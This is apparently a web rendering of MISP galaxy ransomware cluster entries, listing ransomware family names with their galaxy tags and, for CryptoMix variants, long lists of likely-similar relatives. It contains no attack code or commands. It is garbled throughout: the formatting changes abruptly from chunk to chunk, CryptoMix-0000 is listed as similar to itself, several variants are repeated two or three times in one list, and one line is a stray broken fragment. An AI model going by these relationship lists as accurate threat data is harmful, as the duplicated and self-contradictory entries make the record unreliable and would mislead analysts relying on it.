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AlldataLocker
Ransomware
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Amnesia
Ransomware
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Amnesia-2
Ransomware
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Anatova
Ransomware
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AnDROid
Ransomware
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AngryKite
Ransomware
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AnimusLocker
Ransomware
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Annabelle
Ransomware
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Annabelle 2.1
Ransomware
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AnonCrack
Ransomware
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AnonPop
Ransomware
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AnteFrigus
Ransomware
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Anti-DDos
Ransomware
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Antihacker2017
Ransomware
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Anubi NotBTCWare
Ransomware
The tag is: misp-galaxy:ransomware="Anubi NotBTCWare"

Apocalypse-Missing
Ransomware
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ApolloLocker
Ransomware
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Argus
Ransomware
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Armage
Ransomware
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Armageddon
Ransomware
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ArmaLocky
Ransomware
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Arsium
Ransomware
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Assembly
Ransomware
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Ataware
Ransomware
The tag is: misp-galaxy:ransomware="Ataware"

Atchbo
Ransomware
The tag is: misp-galaxy:ransomware="Atchbo"

ATLAS
Ransomware
The tag is: misp-galaxy:ransomware="ATLAS"

Australian-AES
Ransomware
The tag is: misp-galaxy:ransomware="Australian-AES"

AutoEncryptor
Ransomware
The tag is: misp-galaxy:ransomware="AutoEncryptor"

AutoWannaCryV2
Ransomware
The tag is: misp-galaxy:ransomware="AutoWannaCryV2"

Auuahk-Ouuohk
Ransomware
The tag is: misp-galaxy:ransomware="Auuahk-Ouuohk"
AVCrypt
Ransomware
The tag is: misp-galaxy:ransomware="AVCrypt"

AxCrypter
Ransomware
The tag is: misp-galaxy:ransomware="AxCrypter"

aZaZeL
Ransomware
The tag is: misp-galaxy:ransomware="aZaZeL"

BadEncript
Ransomware
The tag is: misp-galaxy:ransomware="BadEncript"

Balbaz
Ransomware
The tag is: misp-galaxy:ransomware="Balbaz"

Baliluware
Ransomware
The tag is: misp-galaxy:ransomware="Baliluware"

Bam!
Ransomware
The tag is: misp-galaxy:ransomware="Bam!"

BananaCrypt
Ransomware
The tag is: misp-galaxy:ransomware="BananaCrypt"
**BancoCrypt HT**
Ransomware
The tag is: `misp-galaxy:ransomware="BancoCrypt HT"`

**Barack Obama’s EBBV**
Ransomware
The tag is: `misp-galaxy:ransomware="Barack Obama's EBBV"`

**Basilisque Locker**
Ransomware
The tag is: `misp-galaxy:ransomware="Basilisque Locker"`

**BASS-FES**
Ransomware
The tag is: `misp-galaxy:ransomware="BASS-FES"`

**BB**
Ransomware
The tag is: `misp-galaxy:ransomware="BB"`

**BeethoveN**
Ransomware
The tag is: `misp-galaxy:ransomware="BeethoveN"`

**BestChangeRu**
Ransomware
The tag is: `misp-galaxy:ransomware="BestChangeRu"`

**BigBossHorse**
Ransomware
The tag is: `misp-galaxy:ransomware="BigBossHorse"`
Birbware
Ransomware
The tag is: misp-galaxy:ransomware="Birbware"

BitCrypt
Ransomware
The tag is: misp-galaxy:ransomware="BitCrypt"

BitCrypt 2.0
Ransomware
The tag is: misp-galaxy:ransomware="BitCrypt 2.0"

BitKangoroo
Ransomware
The tag is: misp-galaxy:ransomware="BitKangoroo"

BitPyLock
Ransomware
The tag is: misp-galaxy:ransomware="BitPyLock"

Bitshifter
Ransomware
The tag is: misp-galaxy:ransomware="Bitshifter"

BKRansomware
Ransomware
The tag is: misp-galaxy:ransomware="BKRansomware"

Black Feather
Ransomware
The tag is: misp-galaxy:ransomware="Black Feather"
**BlackFireEye**

Ransomware

The tag is: *misp-galaxy:ransomware=“BlackFireEye”*

**BlackHat-Mehtihack**

Ransomware

The tag is: *misp-galaxy:ransomware=“BlackHat-Mehtihack”*

**BlackKingdom**

Ransomware

The tag is: *misp-galaxy:ransomware=“BlackKingdom”*

**BlackMist**

Ransomware

The tag is: *misp-galaxy:ransomware=“BlackMist”*

**Blackout**

Ransomware

The tag is: *misp-galaxy:ransomware=“Blackout”*

**BlackPink**

Ransomware

The tag is: *misp-galaxy:ransomware=“BlackPink”*

**BlackRose**

Ransomware

The tag is: *misp-galaxy:ransomware=“BlackRose”*

**BlackSheep**

Ransomware

The tag is: *misp-galaxy:ransomware=“BlackSheep”*
**Black Worm**
Ransomware
The tag is: `misp-galaxy:ransomware="Black Worm"`

**Blank**
Ransomware
The tag is: `misp-galaxy:ransomware="Blank"`

**Blind**
Ransomware
The tag is: `misp-galaxy:ransomware="Blind"`

**Blitzkrieg**
Ransomware
The tag is: `misp-galaxy:ransomware="Blitzkrieg"`

**BlockFile12**
Ransomware
The tag is: `misp-galaxy:ransomware="BlockFile12"`

**BloodJaws**
Ransomware
The tag is: `misp-galaxy:ransomware="BloodJaws"`

**Blooper**
Ransomware
The tag is: `misp-galaxy:ransomware="Blooper"`

**BlueCheeser**
Ransomware
The tag is: `misp-galaxy:ransomware="BlueCheeser"`
Bluerose
Ransomware
The tag is: misp-galaxy:ransomware="Bluerose"

BOK
Ransomware
The tag is: misp-galaxy:ransomware="BOK"

BoooamCrypt
Ransomware
The tag is: misp-galaxy:ransomware="BoooamCrypt"

BooM
Ransomware
The tag is: misp-galaxy:ransomware="BooM"

Boris HT
Ransomware
The tag is: misp-galaxy:ransomware="Boris HT"

BrainLag
Ransomware
The tag is: misp-galaxy:ransomware="BrainLag"

BRRansomware
Ransomware
The tag is: misp-galaxy:ransomware="BRRansomware"

Brick
Ransomware
The tag is: misp-galaxy:ransomware="Brick"
BrickR
Ransomware
The tag is: misp-galaxy:ransomware="BrickR"

BtcKING
Ransomware
The tag is: misp-galaxy:ransomware="BtcKING"

BTCWare-Aleta
Ransomware
The tag is: misp-galaxy:ransomware="BTCWare-Aleta"

BTCWare-Gryphon
Ransomware
The tag is: misp-galaxy:ransomware="BTCWare-Gryphon"

BTCWare-Master
Ransomware
The tag is: misp-galaxy:ransomware="BTCWare-Master"

BTCWare-Nuclear
Ransomware
The tag is: misp-galaxy:ransomware="BTCWare-Nuclear"

BTCWare-Onyon
Ransomware
The tag is: misp-galaxy:ransomware="BTCWare-Onyon"

BTCWare-PayDay
Ransomware
The tag is: misp-galaxy:ransomware="BTCWare-PayDay"
**BTCWare-Wyvern**
Ransomware
The tag is: misp-galaxy:ransomware="BTCWare-Wyvern"

**Bud**
Ransomware
The tag is: misp-galaxy:ransomware="Bud"

**BugWare**
Ransomware
The tag is: misp-galaxy:ransomware="BugWare"

**BulbaCrypt HT**
Ransomware
The tag is: misp-galaxy:ransomware="BulbaCrypt HT"

**BWall**
Ransomware
The tag is: misp-galaxy:ransomware="BWall"

**C0hen Locker**
Ransomware
The tag is: misp-galaxy:ransomware="C0hen Locker"

**CA$HOUT**
Ransomware
The tag is: misp-galaxy:ransomware="CA$HOUT"

**CainXPii**
Ransomware
The tag is: misp-galaxy:ransomware="CainXPii"
Cephalo
Ransomware
The tag is: misp-galaxy:ransomware="Cephalo"

Cerberos
Ransomware
The tag is: misp-galaxy:ransomware="Cerberos"

Charmant
Ransomware
The tag is: misp-galaxy:ransomware="Charmant"

Chekyshka
Ransomware
The tag is: misp-galaxy:ransomware="Chekyshka"

ChernoLocker
Ransomware
The tag is: misp-galaxy:ransomware="ChernoLocker"

ChinaYunLong
Ransomware
The tag is: misp-galaxy:ransomware="ChinaYunLong"

Christmas
Ransomware
The tag is: misp-galaxy:ransomware="Christmas"

ClicoCrypter
Ransomware
The tag is: misp-galaxy:ransomware="ClicoCrypter"
ClicoCrypter-2
Ransomware
The tag is: `misp-galaxy:ransomware="ClicoCrypter-2"`

Clouded
Ransomware
The tag is: `misp-galaxy:ransomware="Clouded"`

Cmd
Ransomware
The tag is: `misp-galaxy:ransomware="Cmd"`

Codemanager
Ransomware
The tag is: `misp-galaxy:ransomware="Codemanager"`

Coin Locker
Ransomware
The tag is: `misp-galaxy:ransomware="Coin Locker"`

Comrade HT
Ransomware
The tag is: `misp-galaxy:ransomware="Comrade HT"`

CoNFicker
Ransomware
The tag is: `misp-galaxy:ransomware="CoNFicker"`

Coom
Ransomware
The tag is: `misp-galaxy:ransomware="Coom"`
CorruptCrypt
Ransomware
The tag is: misp-galaxy:ransomware="CorruptCrypt"

Creeper
Ransomware
The tag is: misp-galaxy:ransomware="Creeper"

Creepy
Ransomware
The tag is: misp-galaxy:ransomware="Creepy"

Cripton
Ransomware
The tag is: misp-galaxy:ransomware="Cripton"

Cripton7zp
Ransomware
The tag is: misp-galaxy:ransomware="Cripton7zp"

Cry36
Ransomware
The tag is: misp-galaxy:ransomware="Cry36"

Cry9
Ransomware
The tag is: misp-galaxy:ransomware="Cry9"

CryCipher
Ransomware
The tag is: misp-galaxy:ransomware="CryCipher"
CryCipher is also known as:

- PayPalGenerator2019

**CryForMe**

Ransomware

The tag is: `misp-galaxy:ransomware="CryForMe"`

**Crying**

Ransomware

The tag is: `misp-galaxy:ransomware="Crying"`

**CryMore**

Ransomware

The tag is: `misp-galaxy:ransomware="CryMore"`

**Cryp70n1c**

Ransomware

The tag is: `misp-galaxy:ransomware="Cryp70n1c"`

**Crypt0 HT**

Ransomware

The tag is: `misp-galaxy:ransomware="Crypt0 HT"`

**Crypt0**

Ransomware

The tag is: `misp-galaxy:ransomware="Crypt0"`

**Crypt0L0cker**

Ransomware

The tag is: `misp-galaxy:ransomware="Crypt0L0cker"`
Crypt0r
Ransomware
The tag is: `misp-galaxy:ransomware="Crypt0r"`

Crypt12
Ransomware
The tag is: `misp-galaxy:ransomware="Crypt12"`

CryptFuck
Ransomware
The tag is: `misp-galaxy:ransomware="CryptFuck"`

CryptGh0st
Ransomware
The tag is: `misp-galaxy:ransomware="CryptGh0st"`

Crypto_Lab
Ransomware
The tag is: `misp-galaxy:ransomware="Crypto_Lab"`

CryptoApp
Ransomware
The tag is: `misp-galaxy:ransomware="CryptoApp"`

Crypto-Blocker
Ransomware
The tag is: `misp-galaxy:ransomware="Crypto-Blocker"`

CryptoBoss
Ransomware
The tag is: `misp-galaxy:ransomware="CryptoBoss"`
CryptoCat
Ransomware
The tag is: misp-galaxy:ransomware="CryptoCat"

CryptoClone
Ransomware
The tag is: misp-galaxy:ransomware="CryptoClone"

CryptoDark
Ransomware
The tag is: misp-galaxy:ransomware="CryptoDark"

CryptoGod 2017
Ransomware
The tag is: misp-galaxy:ransomware="CryptoGod 2017"

CryptoGod 2018
Ransomware
The tag is: misp-galaxy:ransomware="CryptoGod 2018"

CryptoLite
Ransomware
The tag is: misp-galaxy:ransomware="CryptoLite"

CryptolockerEmulator
Ransomware
The tag is: misp-galaxy:ransomware="CryptolockerEmulator"

CryptoLockerEU 2016
Ransomware
The tag is: misp-galaxy:ransomware="CryptoLockerEU 2016"
CryptoManiac

Ransomware

The tag is: `misp-galaxy:ransomware="CryptoManiac"`

CryptoMix-0000

Ransomware

The tag is: `misp-galaxy:ransomware="CryptoMix-0000"`

CryptoMix-0000 has relationships with:

- similar: `misp-galaxy:ransomware="CryptoMix"` with estimative-language:likelihood-probability="likely"
- similar: `misp-galaxy:ransomware="CryptoMix-Arena"` with estimative-language:likelihood-probability="likely"
- similar: `misp-galaxy:ransomware="CryptoMix-Azer"` with estimative-language:likelihood-probability="likely"
- similar: `misp-galaxy:ransomware="CryptoMix-Backup"` with estimative-language:likelihood-probability="likely"
- similar: `misp-galaxy:ransomware="CryptoMix-CK"` with estimative-language:likelihood-probability="likely"
- similar: `misp-galaxy:ransomware="CryptoMix-Coban"` with estimative-language:likelihood-probability="likely"
- similar: `misp-galaxy:ransomware="CryptoMix-DLL"` with estimative-language:likelihood-probability="likely"
- similar: `misp-galaxy:ransomware="CryptoMix-Empty"` with estimative-language:likelihood-probability="likely"
- similar: `misp-galaxy:ransomware="CryptoMix-Error"` with estimative-language:likelihood-probability="likely"
- similar: `misp-galaxy:ransomware="CryptoMix-Exte"` with estimative-language:likelihood-probability="likely"
- similar: `misp-galaxy:ransomware="Cryptomix-FILE"` with estimative-language:likelihood-probability="likely"
- similar: `misp-galaxy:ransomware="CryptoMix-MOLE66"` with estimative-language:likelihood-probability="likely"
- similar: `misp-galaxy:ransomware="CryptoMix-Noob"` with estimative-language:likelihood-probability="likely"
- similar: `misp-galaxy:ransomware="CryptoMix-Ogonia"` with estimative-language:likelihood-probability="likely"
- similar: `misp-galaxy:ransomware="CryptoMix-Pirate"` with estimative-language:likelihood-
probabiility="likely"

• similar: misp-galaxy:ransomware="CryptoMix-Revenge" with estimative-language:likelihood-probability="likely"

• similar: misp-galaxy:ransomware="CryptoMix-0000" with estimative-language:likelihood-probability="likely"

• similar: misp-galaxy:ransomware="CryptoMix-Azer" with estimative-language:likelihood-probability="likely"

• similar: misp-galaxy:ransomware="CryptoMix-Backup" with estimative-language:likelihood-probability="likely"

• similar: misp-galaxy:ransomware="CryptoMix-CK" with estimative-language:likelihood-probability="likely"

• similar: misp-galaxy:ransomware="CryptoMix-Test" with estimative-language:likelihood-probability="likely"

• similar: misp-galaxy:ransomware="CryptoMix-Wallet" with estimative-language:likelihood-probability="likely"

• similar: misp-galaxy:ransomware="CryptoMix-Arena" with estimative-language:likelihood-probability="likely"

• similar: misp-galaxy:ransomware="CryptoMix-Azer" with estimative-language:likelihood-probability="likely"

• similar: misp-galaxy:ransomware="CryptoMix-Backup" with estimative-language:likelihood-probability="likely"

• similar: misp-galaxy:ransomware="CryptoMix-CK" with estimative-language:likelihood-probability="likely"

• similar: misp-galaxy:ransomware="CryptoMix-Ray" with estimative-language:likelihood-probability="likely"

• similar: misp-galaxy:ransomware="CryptoMix-Server" with estimative-language:likelihood-probability="likely"

• similar: misp-galaxy:ransomware="CryptoMix-Shark" with estimative-language:likelihood-probability="likely"

• similar: misp-galaxy:ransomware="CryptoMix-Server" with estimative-language:likelihood-probability="likely"

• similar: misp-galaxy:ransomware="CryptoMix-Shark" with estimative-language:likelihood-probability="likely"

• similar: misp-galaxy:ransomware="CryptoMix-System" with estimative-language:likelihood-probability="likely"

• similar: misp-galaxy:ransomware="CryptoMix-Tastylock" with estimative-language:likelihood-probability="likely"

• similar: misp-galaxy:ransomware="CryptoMix-Test" with estimative-language:likelihood-probability="likely"

• similar: misp-galaxy:ransomware="CryptoMix-Wallet" with estimative-language:likelihood-probability="likely"

• similar: misp-galaxy:ransomware="CryptoMix-Work" with estimative-language:likelihood-probability="likely"

• similar: misp-galaxy:ransomware="CryptoMix-x1881" with estimative-language:likelihood-probability="likely"

• similar: misp-galaxy:ransomware="CryptoMix-XZZX" with estimative-language:likelihood-probability="likely"

• similar: misp-galaxy:ransomware="CryptoMix-Zayka" with estimative-language:likelihood-probability="likely"

**CryptoMix-Arena**

Ransomware

The tag is: *misp-galaxy:ransomware="CryptoMix-Arena"*

CryptoMix-Arena has relationships with:

• similar: misp-galaxy:ransomware="CryptoMix" with estimative-language:likelihood-probability="likely"

• similar: misp-galaxy:ransomware="CryptoMix-0000" with estimative-language:likelihood-probability="likely"

• similar: misp-galaxy:ransomware="CryptoMix-Azer" with estimative-language:likelihood-probability="likely"

• similar: misp-galaxy:ransomware="CryptoMix-Backup" with estimative-language:likelihood-probability="likely"

• similar: misp-galaxy:ransomware="CryptoMix-CK" with estimative-language:likelihood-probability="likely"
- similar: misp-galaxy:ransomware="CryptoMix-Coban" with estimative-language:likelihood-probability="likely"
- similar: misp-galaxy:ransomware="CryptoMix-DLL" with estimative-language:likelihood-probability="likely"
- similar: misp-galaxy:ransomware="CryptoMix-Empty" with estimative-language:likelihood-probability="likely"
- similar: misp-galaxy:ransomware="CryptoMix-Error" with estimative-language:likelihood-probability="likely"
- similar: misp-galaxy:ransomware="CryptoMix-Exte" with estimative-language:likelihood-probability="likely"
- similar: misp-galaxy:ransomware="Cryptomix-FILE" with estimative-language:likelihood-probability="likely"
- similar: misp-galaxy:ransomware="CryptoMix-MOLE66" with estimative-language:likelihood-probability="likely"
- similar: misp-galaxy:ransomware="CryptoMix-Noob" with estimative-language:likelihood-probability="likely"
- similar: misp-galaxy:ransomware="CryptoMix-Ogonia" with estimative-language:likelihood-probability="likely"
- similar: misp-galaxy:ransomware="CryptoMix-Pirate" with estimative-language:likelihood-probability="likely"
- similar: misp-galaxy:ransomware="CryptoMix-Revenge" with estimative-language:likelihood-probability="likely"
- similar: misp-galaxy:ransomware="Cryptomix-SERVER" with estimative-language:likelihood-probability="likely"
- similar: misp-galaxy:ransomware="CryptoMix-Shark" with estimative-language:likelihood-probability="likely"
- similar: misp-galaxy:ransomware="CryptoMix-System" with estimative-language:likelihood-probability="likely"
- similar: misp-galaxy:ransomware="CryptoMix-Tastylock" with estimative-language:likelihood-probability="likely"
- similar: misp-galaxy:ransomware="CryptoMix-Test" with estimative-language:likelihood-probability="likely"
- similar: misp-galaxy:ransomware="CryptoMix-Wallet" with estimative-language:likelihood-probability="likely"
- similar: misp-galaxy:ransomware="Cryptomix-WORK" with estimative-language:likelihood-probability="likely"
- similar: misp-galaxy:ransomware="CryptoMix-x1881" with estimative-language:likelihood-probability="likely"
- similar: misp-galaxy:ransomware="CryptoMix-XZZX" with estimative-language:likelihood-probability="likely"
• similar: misp-galaxy:ransomware="CryptoMix-Zayka" with estimative-language:likelihood-probability="likely"

**CryptoMix-Azer**

Ransomware

The tag is: *misp-galaxy:ransomware="CryptoMix-Azer"

CryptoMix-Azer has relationships with:

• similar: misp-galaxy:ransomware="CryptoMix" with estimative-language:likelihood-probability="likely"
• similar: misp-galaxy:ransomware="CryptoMix-0000" with estimative-language:likelihood-probability="likely"
• similar: misp-galaxy:ransomware="CryptoMix-Arena" with estimative-language:likelihood-probability="likely"
• similar: misp-galaxy:ransomware="CryptoMix-Backup" with estimative-language:likelihood-probability="likely"
• similar: misp-galaxy:ransomware="CryptoMix-CK" with estimative-language:likelihood-probability="likely"
• similar: misp-galaxy:ransomware="CryptoMix-Coban" with estimative-language:likelihood-probability="likely"
• similar: misp-galaxy:ransomware="CryptoMix-DLL" with estimative-language:likelihood-probability="likely"
• similar: misp-galaxy:ransomware="CryptoMix-Empty" with estimative-language:likelihood-probability="likely"
• similar: misp-galaxy:ransomware="CryptoMix-Error" with estimative-language:likelihood-probability="likely"
• similar: misp-galaxy:ransomware="CryptoMix-Exte" with estimative-language:likelihood-probability="likely"
• similar: misp-galaxy:ransomware="Cryptomix-FILE" with estimative-language:likelihood-probability="likely"
• similar: misp-galaxy:ransomware="CryptoMix-MOLE66" with estimative-language:likelihood-probability="likely"
• similar: misp-galaxy:ransomware="CryptoMix-Noob" with estimative-language:likelihood-probability="likely"
• similar: misp-galaxy:ransomware="CryptoMix-Ogonia" with estimative-language:likelihood-probability="likely"
• similar: misp-galaxy:ransomware="CryptoMix-Pirate" with estimative-language:likelihood-probability="likely"
• similar: misp-galaxy:ransomware="CryptoMix-Revenge" with estimative-language:likelihood-probability="likely"
probability="likely"

• similar: misp-galaxy:ransomware="Cryptomix-SERVER" with estimative-language:likelihood-probability="likely"

• similar: misp-galaxy:ransomware="CryptoMix-Shark" with estimative-language:likelihood-probability="likely"

• similar: misp-galaxy:ransomware="CryptoMix-System" with estimative-language:likelihood-probability="likely"

• similar: misp-galaxy:ransomware="CryptoMix-Tastylock" with estimative-language:likelihood-probability="likely"

• similar: misp-galaxy:ransomware="CryptoMix-Test" with estimative-language:likelihood-probability="likely"

• similar: misp-galaxy:ransomware="CryptoMix-Wallet" with estimative-language:likelihood-probability="likely"

• similar: misp-galaxy:ransomware="Cryptomix-WORK" with estimative-language:likelihood-probability="likely"

• similar: misp-galaxy:ransomware="CryptoMix-x1881" with estimative-language:likelihood-probability="likely"

• similar: misp-galaxy:ransomware="CryptoMix-XZZX" with estimative-language:likelihood-probability="likely"

• similar: misp-galaxy:ransomware="CryptoMix-Zayka" with estimative-language:likelihood-probability="likely"

**CryptoMix-Backup**

Ransomware

The tag is: *misp-galaxy:ransomware="CryptoMix-Backup"*

CryptoMix-Backup has relationships with:

• similar: misp-galaxy:ransomware="CryptoMix" with estimative-language:likelihood-probability="likely"

• similar: misp-galaxy:ransomware="CryptoMix-0000" with estimative-language:likelihood-probability="likely"

• similar: misp-galaxy:ransomware="CryptoMix-Arena" with estimative-language:likelihood-probability="likely"

• similar: misp-galaxy:ransomware="CryptoMix-Azer" with estimative-language:likelihood-probability="likely"

• similar: misp-galaxy:ransomware="CryptoMix-CK" with estimative-language:likelihood-probability="likely"

• similar: misp-galaxy:ransomware="CryptoMix-Coban" with estimative-language:likelihood-probability="likely"
• similar: misp-galaxy:ransomware="CryptoMix-DLL" with estimative-language:likelihood-probability="likely"
• similar: misp-galaxy:ransomware="CryptoMix-Empty" with estimative-language:likelihood-probability="likely"
• similar: misp-galaxy:ransomware="CryptoMix-Error" with estimative-language:likelihood-probability="likely"
• similar: misp-galaxy:ransomware="CryptoMix-Exte" with estimative-language:likelihood-probability="likely"
• similar: misp-galaxy:ransomware="Cryptomix-FILE" with estimative-language:likelihood-probability="likely"
• similar: misp-galaxy:ransomware="CryptoMix-MOLE66" with estimative-language:likelihood-probability="likely"
• similar: misp-galaxy:ransomware="CryptoMix-Noob" with estimative-language:likelihood-probability="likely"
• similar: misp-galaxy:ransomware="CryptoMix-Ogonia" with estimative-language:likelihood-probability="likely"
• similar: misp-galaxy:ransomware="CryptoMix-Pirate" with estimative-language:likelihood-probability="likely"
• similar: misp-galaxy:ransomware="CryptoMix-Revenge" with estimative-language:likelihood-probability="likely"
• similar: misp-galaxy:ransomware="Cryptomix-SERVER" with estimative-language:likelihood-probability="likely"
• similar: misp-galaxy:ransomware="CryptoMix-Shark" with estimative-language:likelihood-probability="likely"
• similar: misp-galaxy:ransomware="CryptoMix-System" with estimative-language:likelihood-probability="likely"
• similar: misp-galaxy:ransomware="CryptoMix-Tastylock" with estimative-language:likelihood-probability="likely"
• similar: misp-galaxy:ransomware="CryptoMix-Test" with estimative-language:likelihood-probability="likely"
• similar: misp-galaxy:ransomware="CryptoMix-Wallet" with estimative-language:likelihood-probability="likely"
• similar: misp-galaxy:ransomware="Cryptomix-WORK" with estimative-language:likelihood-probability="likely"
• similar: misp-galaxy:ransomware="CryptoMix-x1881" with estimative-language:likelihood-probability="likely"
• similar: misp-galaxy:ransomware="CryptoMix-XZZX" with estimative-language:likelihood-probability="likely"
• similar: misp-galaxy:ransomware="CryptoMix-Zayka" with estimative-language:likelihood-probability="likely"
CryptoMix-CK

Ransomware

The tag is: misp-galaxy:ransomware="CryptoMix-CK"

CryptoMix-CK has relationships with:

- similar: misp-galaxy:ransomware="CryptoMix" with estimative-language:likelihood-probability="likely"
- similar: misp-galaxy:ransomware="CryptoMix-0000" with estimative-language:likelihood-probability="likely"
- similar: misp-galaxy:ransomware="CryptoMix-Arena" with estimative-language:likelihood-probability="likely"
- similar: misp-galaxy:ransomware="CryptoMix-Azer" with estimative-language:likelihood-probability="likely"
- similar: misp-galaxy:ransomware="CryptoMix-Backup" with estimative-language:likelihood-probability="likely"
- similar: misp-galaxy:ransomware="CryptoMix-Coban" with estimative-language:likelihood-probability="likely"
- similar: misp-galaxy:ransomware="CryptoMix-DLL" with estimative-language:likelihood-probability="likely"
- similar: misp-galaxy:ransomware="CryptoMix-Empty" with estimative-language:likelihood-probability="likely"
- similar: misp-galaxy:ransomware="CryptoMix-Error" with estimative-language:likelihood-probability="likely"
- similar: misp-galaxy:ransomware="CryptoMix-Exte" with estimative-language:likelihood-probability="likely"
- similar: misp-galaxy:ransomware="Cryptomix-FILE" with estimative-language:likelihood-probability="likely"
- similar: misp-galaxy:ransomware="CryptoMix-MOLE66" with estimative-language:likelihood-probability="likely"
- similar: misp-galaxy:ransomware="CryptoMix-Noob" with estimative-language:likelihood-probability="likely"
- similar: misp-galaxy:ransomware="CryptoMix-Ogonia" with estimative-language:likelihood-probability="likely"
- similar: misp-galaxy:ransomware="CryptoMix-Pirate" with estimative-language:likelihood-probability="likely"
- similar: misp-galaxy:ransomware="CryptoMix-Revenge" with estimative-language:likelihood-probability="likely"
- similar: misp-galaxy:ransomware="Cryptomix-SERVER" with estimative-language:likelihood-probability="likely"
• similar: misp-galaxy:ransomware="CryptoMix-Shark" with estimative-language:likelihood-probability="likely"

• similar: misp-galaxy:ransomware="CryptoMix-System" with estimative-language:likelihood-probability="likely"

• similar: misp-galaxy:ransomware="CryptoMix-Tastylock" with estimative-language:likelihood-probability="likely"

• similar: misp-galaxy:ransomware="CryptoMix-Test" with estimative-language:likelihood-probability="likely"

• similar: misp-galaxy:ransomware="CryptoMix-Wallet" with estimative-language:likelihood-probability="likely"

• similar: misp-galaxy:ransomware="Cryptomix-WORK" with estimative-language:likelihood-probability="likely"

• similar: misp-galaxy:ransomware="CryptoMix-x1881" with estimative-language:likelihood-probability="likely"

• similar: misp-galaxy:ransomware="CryptoMix-XZZX" with estimative-language:likelihood-probability="likely"

• similar: misp-galaxy:ransomware="CryptoMix-Zayka" with estimative-language:likelihood-probability="likely"

CryptoMix-Coban

Ransomware

The tag is: misp-galaxy:ransomware="CryptoMix-Coban"

CryptoMix-Coban has relationships with:

• similar: misp-galaxy:ransomware="CryptoMix" with estimative-language:likelihood-probability="likely"

• similar: misp-galaxy:ransomware="CryptoMix-0000" with estimative-language:likelihood-probability="likely"

• similar: misp-galaxy:ransomware="CryptoMix-Arena" with estimative-language:likelihood-probability="likely"

• similar: misp-galaxy:ransomware="CryptoMix-Azer" with estimative-language:likelihood-probability="likely"

• similar: misp-galaxy:ransomware="CryptoMix-Backup" with estimative-language:likelihood-probability="likely"

• similar: misp-galaxy:ransomware="CryptoMix-CK" with estimative-language:likelihood-probability="likely"

• similar: misp-galaxy:ransomware="CryptoMix-DLL" with estimative-language:likelihood-probability="likely"

• similar: misp-galaxy:ransomware="CryptoMix-Empty" with estimative-language:likelihood-probability="likely"
• similar: misp-galaxy:ransomware="CryptoMix-Error" with estimative-language:likelihood-probability="likely"

• similar: misp-galaxy:ransomware="CryptoMix-Exte" with estimative-language:likelihood-probability="likely"

• similar: misp-galaxy:ransomware="Cryptomix-FILE" with estimative-language:likelihood-probability="likely"

• similar: misp-galaxy:ransomware="CryptoMix-MOLE66" with estimative-language:likelihood-probability="likely"

• similar: misp-galaxy:ransomware="CryptoMix-Noob" with estimative-language:likelihood-probability="likely"

• similar: misp-galaxy:ransomware="CryptoMix-Ogonia" with estimative-language:likelihood-probability="likely"

• similar: misp-galaxy:ransomware="CryptoMix-Pirate" with estimative-language:likelihood-probability="likely"

• similar: misp-galaxy:ransomware="CryptoMix-Revenge" with estimative-language:likelihood-probability="likely"

• similar: misp-galaxy:ransomware="Cryptomix-SERVER" with estimative-language:likelihood-probability="likely"

• similar: misp-galaxy:ransomware="CryptoMix-Shark" with estimative-language:likelihood-probability="likely"

• similar: misp-galaxy:ransomware="CryptoMix-System" with estimative-language:likelihood-probability="likely"

• similar: misp-galaxy:ransomware="CryptoMix-Tastylock" with estimative-language:likelihood-probability="likely"

• similar: misp-galaxy:ransomware="CryptoMix-Test" with estimative-language:likelihood-probability="likely"

• similar: misp-galaxy:ransomware="CryptoMix-Wallet" with estimative-language:likelihood-probability="likely"

• similar: misp-galaxy:ransomware="Cryptomix-WORK" with estimative-language:likelihood-probability="likely"

• similar: misp-galaxy:ransomware="CryptoMix-x1881" with estimative-language:likelihood-probability="likely"

• similar: misp-galaxy:ransomware="CryptoMix-XZZX" with estimative-language:likelihood-probability="likely"

• similar: misp-galaxy:ransomware="CryptoMix-Zayka" with estimative-language:likelihood-probability="likely"
CryptoMix-DLL

Ransomware

The tag is: misp-galaxy:ransomware="CryptoMix-DLL"

CryptoMix-DLL has relationships with:

- similar: misp-galaxy:ransomware="CryptoMix" with estimative-language:likelihood-probability="likely"
- similar: misp-galaxy:ransomware="CryptoMix-0000" with estimative-language:likelihood-probability="likely"
- similar: misp-galaxy:ransomware="CryptoMix-Arena" with estimative-language:likelihood-probability="likely"
- similar: misp-galaxy:ransomware="CryptoMix-Azer" with estimative-language:likelihood-probability="likely"
- similar: misp-galaxy:ransomware="CryptoMix-Backup" with estimative-language:likelihood-probability="likely"
- similar: misp-galaxy:ransomware="CryptoMix-CK" with estimative-language:likelihood-probability="likely"
- similar: misp-galaxy:ransomware="CryptoMix-Coban" with estimative-language:likelihood-probability="likely"
- similar: misp-galaxy:ransomware="CryptoMix-Empty" with estimative-language:likelihood-probability="likely"
- similar: misp-galaxy:ransomware="CryptoMix-Error" with estimative-language:likelihood-probability="likely"
- similar: misp-galaxy:ransomware="CryptoMix-Exte" with estimative-language:likelihood-probability="likely"
- similar: misp-galaxy:ransomware="Cryptomix-FILE" with estimative-language:likelihood-probability="likely"
- similar: misp-galaxy:ransomware="CryptoMix-MOLE66" with estimative-language:likelihood-probability="likely"
- similar: misp-galaxy:ransomware="CryptoMix-Noob" with estimative-language:likelihood-probability="likely"
- similar: misp-galaxy:ransomware="CryptoMix-Ogonia" with estimative-language:likelihood-probability="likely"
- similar: misp-galaxy:ransomware="CryptoMix-Pirate" with estimative-language:likelihood-probability="likely"
- similar: misp-galaxy:ransomware="CryptoMix-Revenge" with estimative-language:likelihood-probability="likely"
- similar: misp-galaxy:ransomware="Cryptomix-SERVER" with estimative-language:likelihood-probability="likely"
CryptoMix-Empty

Ransomware

The tag is: misp-galaxy:ransomware="CryptoMix-Empty"

CryptoMix-Empty has relationships with:

- similar: misp-galaxy:ransomware="CryptoMix" with estimative-language:likelihood-probability="likely"
- similar: misp-galaxy:ransomware="CryptoMix-0000" with estimative-language:likelihood-probability="likely"
- similar: misp-galaxy:ransomware="CryptoMix-Arena" with estimative-language:likelihood-probability="likely"
- similar: misp-galaxy:ransomware="CryptoMix-Azer" with estimative-language:likelihood-probability="likely"
- similar: misp-galaxy:ransomware="CryptoMix-Backup" with estimative-language:likelihood-probability="likely"
- similar: misp-galaxy:ransomware="CryptoMix-CK" with estimative-language:likelihood-probability="likely"
- similar: misp-galaxy:ransomware="CryptoMix-Coban" with estimative-language:likelihood-probability="likely"
- similar: misp-galaxy:ransomware="CryptoMix-DLL" with estimative-language:likelihood-probability="likely"
• similar: misp-galaxy:ransomware="CryptoMix-Error" with estimative-language:likelihood-probability="likely"
